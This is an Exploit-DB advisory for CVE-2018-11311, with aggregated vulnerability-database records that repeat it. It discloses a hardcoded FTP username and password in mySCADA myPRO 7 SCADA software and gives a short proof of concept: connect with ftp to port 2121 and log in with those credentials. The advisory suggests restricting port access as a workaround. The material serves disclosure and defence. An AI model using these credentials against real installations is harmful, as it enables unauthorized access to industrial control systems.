#Exploit Title: mySCADA myPRO 7 - Hardcoded FTP Username and Password
#Date: 2018-05-19
#Exploit Author: Emre ÖVÜNÇ
#Vendor Homepage: https://www.myscada.org/mypro/
#Software Link: https://www.myscada.org/download/
#Version: v7
#Tested on: Linux, Windows
# I. Problem Description
#In the latest version of myPRO (v7), it has been discovered that the ftp server's -running on port 2121- username and password information is kept in the file by using reverse engineering. Anyone who connects to an FTP server with an authorized account can upload or download files onto the server running myPRO software.
# II. Technical
Hardcoded username:password = myscada:Vikuk63
#Firstly, I found that what ports myPRO listened to. You can get information used by the netstat command about the ports and the services running on it. When you install myPRO, you can see many ports open. The vulnerability works on all supported platforms.
#In my first research on the Windows OS, myPRO has many process and I noticed that ‘myscadagate.exe’ is listening to port #2121.
#I found that they put the username and password (myscada:Vikuk63) in the source code. I obtained access by connecting to port 2121 of myPRO's server with any FTP client.
#(Details: https://emreovunc.com/blog/en/mySCADA-myPRO7-Exploit.pdf)
# III. Solution
#As a workaround you need to restrict port 2121 access from the outside. There is no permanent solution for the vendor because there is no patch available.
{"id": "EDB-ID:44656", "type": "exploitdb", "bulletinFamily": "exploit", "title": "mySCADA myPRO 7 - Hard-Coded Credentials", "description": "mySCADA myPRO 7 - Hard-Coded Credentials. CVE-2018-11311. Remote exploit for Multiple platform", "published": "2018-05-20T00:00:00", "modified": "2018-05-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/44656/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2018-11311"], "lastseen": "2018-05-24T14:22:46", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2018-0697"]}, {"type": "cve", "idList": ["CVE-2018-11311"]}, {"type": "exploitdb", "idList": ["EDB-ID:48620"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147705"]}, {"type": "zdt", "idList": ["1337DAY-ID-30389", "1337DAY-ID-34605"]}], "rev": 4}, "score": {"value": 3.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2018-0697"]}, {"type": "cve", "idList": ["CVE-2018-11311"]}, {"type": "exploitdb", "idList": ["EDB-ID:48620"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147705"]}, {"type": "zdt", "idList": ["1337DAY-ID-30389"]}]}, "exploitation": null, "vulnersScore": 3.7}, "sourceHref": "https://www.exploit-db.com/download/44656/", "sourceData": "#Exploit Title: mySCADA myPRO 7 - Hardcoded FTP Username and Password\r\n#Date: 2018-05-19\r\n#Exploit Author: Emre \u00d6V\u00dcN\u00c7\r\n#Vendor Homepage: https://www.myscada.org/mypro/\r\n#Software Link: https://www.myscada.org/download/\r\n#Version: v7\r\n#Tested on: Linux, Windows\r\n\r\n# I. Problem Description\r\n\r\n#In the latest version of myPRO (v7), it has been discovered that the ftp server's -running on port 2121- username and password information is kept in the file by using reverse engineering. Anyone who connects to an FTP server with an authorized account can upload or download files onto the server running myPRO software.\r\n\r\n# II. Technical \r\n\r\nHardcoded username:password = myscada:Vikuk63\r\n\r\n#Firstly, I found that what ports myPRO listened to. You can get information used by the netstat command about the ports and the services running on it. When you install myPRO, you can see many ports open. The vulnerability works on all supported platforms.\r\n\r\n#In my first research on the Windows OS, myPRO has many process and I noticed that \u2018myscadagate.exe\u2019 is listening to port #2121. \r\n\r\n#I found that they put the username and password (myscada:Vikuk63) in the source code. I obtained access by connecting to port 2121 of myPRO's server with any FTP client.\r\n\r\n#(Details: https://emreovunc.com/blog/en/mySCADA-myPRO7-Exploit.pdf)\r\n\r\n# III. Solution\r\n\r\n#As a workaround you need to restrict port 2121 access from the outside. There is no permanent solution for the vendor because there is no patch available.", "osvdbidlist": [], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "edition": 2, "scheme": null, "_state": {"dependencies": 1645364402}}
{"zdt": [{"lastseen": "2018-05-20T20:48:10", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-05-20T00:00:00", "type": "zdt", "title": "mySCADA myPRO 7 - Hard-Coded Credentials Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11311"], "modified": "2018-05-20T00:00:00", "id": "1337DAY-ID-30389", "href": "https://0day.today/exploit/description/30389", "sourceData": "#Exploit Title: mySCADA myPRO 7 - Hardcoded FTP Username and Password\r\n#Exploit Author: Emre \u00d6V\u00dcN\u00c7\r\n#Vendor Homepage: https://www.myscada.org/mypro/\r\n#Software Link: https://www.myscada.org/download/\r\n#Version: v7\r\n#Tested on: Linux, Windows\r\n \r\n# I. Problem Description\r\n \r\n#In the latest version of myPRO (v7), it has been discovered that the ftp server's -running on port 2121- username and password information is kept in the file by using reverse engineering. Anyone who connects to an FTP server with an authorized account can upload or download files onto the server running myPRO software.\r\n \r\n# II. Technical \r\n \r\nHardcoded username:password = myscada:Vikuk63\r\n \r\n#Firstly, I found that what ports myPRO listened to. You can get information used by the netstat command about the ports and the services running on it. When you install myPRO, you can see many ports open. The vulnerability works on all supported platforms.\r\n \r\n#In my first research on the Windows OS, myPRO has many process and I noticed that \u2018myscadagate.exe\u2019 is listening to port #2121. \r\n \r\n#I found that they put the username and password (myscada:Vikuk63) in the source code. I obtained access by connecting to port 2121 of myPRO's server with any FTP client.\r\n \r\n#(Details: https://emreovunc.com/blog/en/mySCADA-myPRO7-Exploit.pdf)\r\n \r\n# III. Solution\r\n \r\n#As a workaround you need to restrict port 2121 access from the outside. There is no permanent solution for the vendor because there is no patch available.\n\n# 0day.today [2018-05-20] #", "sourceHref": "https://0day.today/exploit/30389", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-20T23:20:19", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2020-06-26T00:00:00", "type": "zdt", "title": "mySCADA myPRO 7 - Hardcoded Credentials Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11311"], "modified": "2020-06-26T00:00:00", "id": "1337DAY-ID-34605", "href": "https://0day.today/exploit/description/34605", "sourceData": "# Exploit Title: mySCADA myPRO v7 Hardcoded Credentials\n# Exploit Author: Emre \u00d6V\u00dcN\u00c7\n# Vendor Homepage: http://myscada.org\n# Software Link: https://www.myscada.org/mypro/\n# Version: v7.0.45\n# Tested on: Windows/Linux\n# CVE-2018-11311\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311\n# https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password\n\n# PoC\n\nftp [IP] 2121\n\nusername: myscada\n\npassword: Vikuk63\n", "sourceHref": "https://0day.today/exploit/34605", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:27:37", "description": "An authentication bypass vulnerability has been reported in mySCADA myPRO 7 FTP Server. The vulnerability is due to the presence of hard coded credentials. A remote attacker can exploit this vulnerability by accessing the FTP Server using those credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-07-09T00:00:00", "type": "checkpoint_advisories", "title": "mySCADA myPRO 7 Authentication Bypass (CVE-2018-11311)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11311"], "modified": "2018-07-16T00:00:00", "id": "CPAI-2018-0697", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T12:18:11", "description": "A hardcoded FTP username of myscada and password of Vikuk63 in 'myscadagate.exe' in mySCADA myPRO 7 allows remote attackers to access the FTP server on port 2121, and upload files or list directories, by entering these credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-05-20T22:29:00", "type": "cve", "title": "CVE-2018-11311", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11311"], "modified": "2018-06-26T17:15:00", "cpe": ["cpe:/a:myscada:mypro:7.0"], "id": "CVE-2018-11311", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11311", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:myscada:mypro:7.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2018-05-21T01:35:00", "description": "", "published": "2018-05-20T00:00:00", "type": "packetstorm", "title": "mySCADA myPRO 7 Hardcoded Credentials", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11311"], "modified": "2018-05-20T00:00:00", "id": "PACKETSTORM:147705", "href": "https://packetstormsecurity.com/files/147705/mySCADA-myPRO-7-Hardcoded-Credentials.html", "sourceData": "`#Exploit Title: mySCADA myPRO 7 - Hardcoded FTP Username and Password \n#Date: 2018-05-19 \n#Exploit Author: Emre AVANA \n#Vendor Homepage: https://www.myscada.org/mypro/ \n#Software Link: https://www.myscada.org/download/ \n#Version: v7 \n#Tested on: Linux, Windows \n \n# I. Problem Description \n \n#In the latest version of myPRO (v7), it has been discovered that the ftp server's -running on port 2121- username and password information is kept in the file by using reverse engineering. Anyone who connects to an FTP server with an authorized account can upload or download files onto the server running myPRO software. \n \n# II. Technical \n \nHardcoded username:password = myscada:Vikuk63 \n \n#Firstly, I found that what ports myPRO listened to. You can get information used by the netstat command about the ports and the services running on it. When you install myPRO, you can see many ports open. The vulnerability works on all supported platforms. \n \n#In my first research on the Windows OS, myPRO has many process and I noticed that amyscadagate.exea is listening to port #2121. \n \n#I found that they put the username and password (myscada:Vikuk63) in the source code. I obtained access by connecting to port 2121 of myPRO's server with any FTP client. \n \n#(Details: https://emreovunc.com/blog/en/mySCADA-myPRO7-Exploit.pdf) \n \n# III. Solution \n \n#As a workaround you need to restrict port 2121 access from the outside. There is no permanent solution for the vendor because there is no patch available. \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147705/myscadamypro-hardcoded.txt"}], "exploitdb": [{"lastseen": "2022-05-13T17:46:38", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-06-25T00:00:00", "type": "exploitdb", "title": "mySCADA myPRO 7 - Hardcoded Credentials", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["2018-11311", "CVE-2018-11311"], "modified": "2020-06-25T00:00:00", "id": "EDB-ID:48620", "href": "https://www.exploit-db.com/exploits/48620", "sourceData": "# Exploit Title: mySCADA myPRO v7 Hardcoded Credentials\r\n# Date: 2018-07-02\r\n# Exploit Author: Emre \u00d6V\u00dcN\u00c7\r\n# Vendor Homepage: http://myscada.org\r\n# Software Link: https://www.myscada.org/mypro/\r\n# Version: v7.0.45\r\n# Tested on: Windows/Linux\r\n# CVE-2018-11311\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311\r\n# https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password\r\n\r\n# PoC\r\n\r\nftp [IP] 2121\r\n\r\nusername: myscada\r\n\r\npassword: Vikuk63", "sourceHref": "https://www.exploit-db.com/download/48620", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}]}